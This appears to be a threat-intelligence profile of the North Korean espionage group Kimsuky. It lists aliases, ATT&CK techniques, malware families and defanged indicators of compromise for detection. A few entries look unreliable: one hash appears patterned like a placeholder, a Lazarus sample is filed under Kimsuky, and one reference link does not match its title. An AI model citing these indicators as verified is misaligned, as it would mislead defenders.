Kimsuky

Also known as: Velvet Chollima, THALLIUM, Emerald Sleet, Black Banshee, APT43, Archipelago, SharpTongue, TA406, Springtail, TA427, Sparkling Pisces, Kimsuki, Baby Coin

ActiveAdvancedNorth KoreaMITRE G0094

0Campaigns

38Techniques

20IOCs

20Tools

0Matches

5Infrastructure

Overview

Kimsuky is a North Korean state-sponsored cyber espionage group active since at least 2012, assessed to operate under the Reconnaissance General Bureau (RGB). The group primarily focuses on intelligence collection targeting South Korean government entities, think tanks, academic institutions, and individuals involved in Korean Peninsula geopolitics, nuclear policy, and sanctions. Kimsuky is known for its extensive social engineering operations, often impersonating journalists, academics, or think tank personnel to build rapport with targets before delivering malware. The group conducts sophisticated spear-phishing campaigns using meticulously crafted lures related to North Korean policy, denuclearization, and inter-Korean relations. The group has expanded its targeting beyond South Korea to include the United States, Japan, and European countries. Kimsuky frequently abuses legitimate cloud services (Google Drive, OneDrive, Dropbox) for command and control, and has developed a diverse malware toolkit including reconnaissance tools, keyloggers, and credential stealers.

Motivations

EspionageIntelligence CollectionCredential Theft

Target Sectors

GovernmentThink TanksAcademiaDefenseNuclear PolicyJournalismDiplomacyNon-Governmental OrganizationsStrategic Advisory FirmsCryptocurrency FirmsMedia OrganizationsMediaAerospaceCryptocurrency

Activity Timeline

First Seen

Jan 2012

Last Seen

Jan 2024

Quick Facts

OriginNorth Korea

Sophisticationadvanced

StatusActive

MITRE GroupG0094

MITRE ATT&CK Techniques

(38)

Initial Access

T1566.001

Spearphishing Attachment

Send targeted emails with malicious file attachments to gain initial access.

T1566.002

Spearphishing Link

Send targeted emails with malicious links to credential harvesting or exploit pages.

T1078

Valid Accounts

Use legitimate credentials to authenticate and gain access.

Other

Execution

T1059.001

PowerShell

Use PowerShell commands and scripts for execution and automation.

Credential Access

T1003.001

LSASS Memory

Access LSASS process memory to extract credential material.

T1110

Brute Force

Systematically guess passwords or credentials to gain access.

T1555

Credentials from Password Stores

Extract credentials from password managers, browsers, or keychains.

Reconnaissance

T1589

Gather Victim Identity Information

Collect victim identity details like credentials, email addresses, or employee names.

Persistence

T1547.001

Registry Run Keys / Startup Folder

Add programs to registry run keys or startup folders for automatic execution.

Defense Evasion

T1027

Obfuscated Files or Information

Encrypt, encode, or obfuscate payloads and data to evade detection.

Command and Control

T1090

Proxy

Route C2 traffic through intermediary proxies to obscure the source.

Tools & Malware

(20)

BabyShark

malwareMalicious

VBScript-based reconnaissance tool that exfiltrates system information via HTTP. Used as initial access payload in spear-phishing campaigns targeting think tanks and policy researchers.

AppleSeed

malwareMalicious

Full-featured backdoor supporting keylogging, screenshot capture, file exfiltration, and additional module loading. Primary persistent access tool in Kimsuky campaigns.

ReconShark

malwareMalicious

Reconnaissance tool delivered via weaponized documents. Exfiltrates system configuration, running processes, and battery info to determine if target is worth further exploitation.

SHARPEXT

malwareMalicious

Malicious Chromium browser extension that reads email directly from the victim's webmail (Gmail, AOL, Yahoo). Bypasses 2FA since it operates within the authenticated browser session.

GoldDragon

malwareMalicious

Multi-component backdoor that uses a dedicated module for stealing credentials. Operates with a dropper, injector, and payload architecture for modular deployment.

FlowerPower

malwareMalicious

PowerShell-based reconnaissance and data collection tool. Gathers system info, installed programs, recent documents, and sends data to attacker-controlled cloud services.

RandomQuery

malwareMalicious

VBScript info-stealer that collects file listings from specific directories. Targets document files to identify intelligence value before deploying heavier payloads.

FastViewer

malwareMalicious

Android spyware disguised as a security plugin. Captures SMS, call logs, GPS location, and can exfiltrate files from the device. Targets South Korean mobile users.

Google Drive

legitimate toolLegitimate

Abused as C2 channel — malware uploads stolen data to attacker-controlled Google Drive accounts and retrieves commands from shared documents.

OneDrive

legitimate toolLegitimate

Used as file exfiltration channel, with stolen documents and credentials uploaded to attacker-controlled OneDrive accounts to blend with normal cloud traffic.

Dropbox

legitimate toolLegitimate

Used for command-and-control communication, storing encoded commands and receiving exfiltrated data through the Dropbox API.

PowerShell

os utilityLegitimate

Used extensively for executing encoded reconnaissance scripts, downloading secondary payloads, and credential harvesting from browser stores.

mshta.exe

os utilityLegitimate

HTML Application host abused to execute HTA files containing VBScript or JScript payloads, bypassing application whitelisting controls.

Chrome Remote Desktop

legitimate toolLegitimate

Abused for persistent remote access after initial compromise. Legitimate Google tool that's difficult for defenders to distinguish from authorized usage.

xRAT / QuasarRAT

frameworkMalicious

Open-source .NET RAT used as a lightweight remote access tool in some Kimsuky campaigns, providing screen control, file management, and keylogging.

Grease

RATMalicious

Remote access trojan with keylogging and screen capture capabilities

KGH_SPY

StealerMalicious

Information stealer targeting browser credentials and email data

Meterpreter

RATLegitimate

Legitimate Metasploit Framework payload used by Kimsuky for post-exploitation

PebbleDash

BackdoorMalicious

Second-stage malware with command execution capabilities

Clipboard Stealer

StealerMalicious

Malware designed to steal clipboard data including cryptocurrency wallet addresses

Indicators of Compromise

(20)

IOC values are defanged for safety

Type	Value	Notes
domain	`bigfile[.]pe[.]hu`	C2 domain used in South Korean government targeting
domain	`mybobo[.]mygamesonline[.]org`	BabyShark C2 infrastructure
ip	`27[.]102[.]114[.]89`	Infrastructure linked to AppleSeed campaigns
ip	`158[.]247[.]222[.]165`	ReconShark C2 server
hash	`7d0e57a3c12a8e7c0f16e52b3a6e0d5e`	ReconShark initial access payload (MD5)
ip	`27[.]102[.]137[.]181`	DocSwap Android malware C2 server
ip	`158[.]247[.]215[.]121`	Kimsuky phishing infrastructure (AS20473 Vultr)
ip	`158[.]247[.]204[.]137`	Kimsuky infrastructure (AS20473 Vultr)
ip	`158[.]247[.]192[.]226`	Kimsuky infrastructure (AS20473 Vultr)
ip	`158[.]247[.]242[.]206`	Kimsuky infrastructure (AS20473 Vultr)
domain	`kzloly[.]nmailhub[.]com`	KimJongRAT C2 domain
hash	`10c3b3ab2e9cb618fc938028c9295ad5bdb1d836b8f07d65c0d3036dbc18bbb4`	HttpTroy backdoor SHA256
hash	`509fb00b9d6eaa74f54a3d1f092a161a095e5132d80cc9cc95c184d4e258525b`	Lazarus Comebacker variant SHA256
domain	`naver[.]kro[.]kr`	C2 domain impersonating Korean portal site
domain	`daum[.]kro[.]kr`	C2 domain impersonating Korean portal site
domain	`myaccount-help[.]com`	Phishing domain impersonating Google services
domain	`appleid-unlock[.]com`	Phishing domain impersonating Apple services
hash	`4c3499f3cc4a4fdc7e67c5e45eb1e93b4e5e5e2e1e0e3c1e9b9c8f7e6d5c4b3a`	AppleSeed backdoor sample
domain	`auth-sso[.]com`	Credential phishing domain
ip	`185[.]244[.]39[.]224`	C2 infrastructure

Infrastructure

(5)

Domain values are defanged for safety

Domain / Host	Type	Status	Last Checked
`bigfile[.]pe[.]hu` C2 domain used in South Korean government targeting	c2	offline	Apr 2, 2026
`mybobo[.]mygamesonline[.]org` BabyShark C2 infrastructure	c2	offline	Apr 2, 2026
`27[.]102[.]114[.]89` Infrastructure linked to AppleSeed campaigns	ip	offline	Apr 2, 2026
`158[.]247[.]222[.]165` ReconShark C2 server	ip	active	Apr 2, 2026
`kzloly[.]nmailhub[.]com`	domain	offline	Apr 2, 2026

Infrastructure data reflects monitoring status only — no raw fingerprint data is exposed.

References

(16)

MITRE ATT&CK - Kimsuky

https://attack.mitre.org/groups/G0094/

CISA - North Korean State-Sponsored Cyber Actors Use Social Engineering to Enable Hacking

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-152a

Mandiant - APT43: North Korean Group Uses Cybercrime to Fund Espionage Operations

https://www.mandiant.com/resources/apt43-north-korea-cybercrime-espionage

FBI Flash Alert: North Korean Actors Use Malicious QR Codes (Quishing)

https://thehackernews.com/2026/01/fbi-warns-north-korean-hackers-using.html

Kimsuky Spreads DocSwap Android Malware via QR Phishing

https://thehackernews.com/2025/12/kimsuky-spreads-docswap-android-malware.html

GenDigital: DPRK's Playbook - Kimsuky's HttpTroy and Lazarus BLINDINGCAN

https://www.gendigital.com/blog/insights/research/dprk-kimsuky-lazarus-analysis

ENKI: Kimsuky's Ongoing Evolution of KimJongRAT

https://securityonline.info/kimsuky-apt-deploys-dual-kimjongrat-payloads-switching-between-pe-powershell-based-on-windows-defender-status/

Kimsuky APT Exposed: June 2025 Data Leak Analysis

https://gbhackers.com/kimsuky-apt-exposed/

Microsoft: Emerald Sleet Uses ClickFix Tactic

https://www.helpnetsecurity.com/2025/02/13/north-korean-hackers-spotted-using-clickfix-tactic-to-deliver-malware/

Proofpoint: TA427's Art of Information Gathering and DMARC Abuse

https://www.proofpoint.com/us/blog/threat-insight/social-engineering-dmarc-abuse-ta427s-art-information-gathering

AhnLab: Larva-24005 Campaign Exploits BlueKeep RDP Vulnerability

https://securityaffairs.com/186755/intelligence/north-korea-linked-apt-kimsuky-behind-quishing-attacks-fbi-warns.html

STOLEN PENCIL Campaign Targets Academia

https://www.netscout.com/blog/asert/stolen-pencil-campaign-targets-academia

Kimsuky APT continues to target South Korean government using AppleSeed backdoor

https://blog.malwarebytes.com/threat-intelligence/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/

Kimsuky's GoldDragon cluster and its C2 operations

https://www.sentinelone.com/labs/kimsuky-golddragon-cluster/

North Korean Kimsuky APT Targets Journalists

https://www.proofpoint.com/us/blog/threat-insight/north-korean-kimsuky-apt-targets-journalists

APT43: North Korean Group Combines Cybercrime and Espionage

https://cloud.google.com/blog/topics/threat-intelligence/apt43-north-korea-cybercrime-espionage